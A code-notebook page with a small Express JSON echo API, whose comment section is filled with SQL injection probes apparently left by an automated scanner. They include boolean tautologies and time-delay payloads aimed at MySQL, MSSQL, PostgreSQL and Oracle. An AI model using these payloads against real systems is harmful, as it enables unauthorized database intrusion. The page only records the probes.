untitled notebook

node v18.11.0
version: 1.0.0
endpointsharetweet
const express = require("express"); const app = express(); const port = 3000; // use body-parser to automatically parse JSON-encoded request bodies const bodyParser = require("body-parser"); app.use(bodyParser.json()); const helperMessage = { message: "Try posting JSON to this endpoint!" }; // add a helper message encouraging POSTing to this API app.get("/", (req, res) => res.json(helperMessage)); // listen for POST requests and respond based on that POSTed data app.post("/", (req, res) => { if (req.body.key) return res.send({ key: req.body.key }); return res.send({ message: `You posted ${JSON.stringify(req.body)}` }); }); app.listen(port, () => console.log(`Example API listening on port ${port}!`)); /* Try it out by POSTing to this endpoint! Get this API's URL from the Endpoint button at the top of the Notebook curl -X "POST" <ENDPOINT URL> \ -H 'Content-Type: application/json; charset=utf-8' \ -d #x27;{ "key": "value" }' */
Loading…

26 comments

  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    -1 OR 2+540-540-1=0+0+0+1 --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    -1 OR 2+288-288-1=0+0+0+1
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    -1' OR 2+366-366-1=0+0+0+1 --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    -1' OR 2+129-129-1=0+0+0+1 or '4SNWpVhH'='
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    -1" OR 2+844-844-1=0+0+0+1 --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1*if(now()=sysdate(),sleep(15),0)
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1; waitfor delay '0:0:15' --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1); waitfor delay '0:0:15' --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1 waitfor delay '0:0:15' --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1nssPA162'; waitfor delay '0:0:15' --
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1 OR 117=(SELECT 117 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1) OR 619=(SELECT 619 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1-1)) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1nIkX7DjD' OR 901=(SELECT 901 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    12LiJTZAe') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1APOAztRm')) OR 423=(SELECT 423 FROM PG_SLEEP(15))--
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    '"
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    ����%2527%2522\'\"
  • posted 2 months ago by 396abf98bfbf9e0278c0ff5763ab8d98
    @@3NdRF

sign in to comment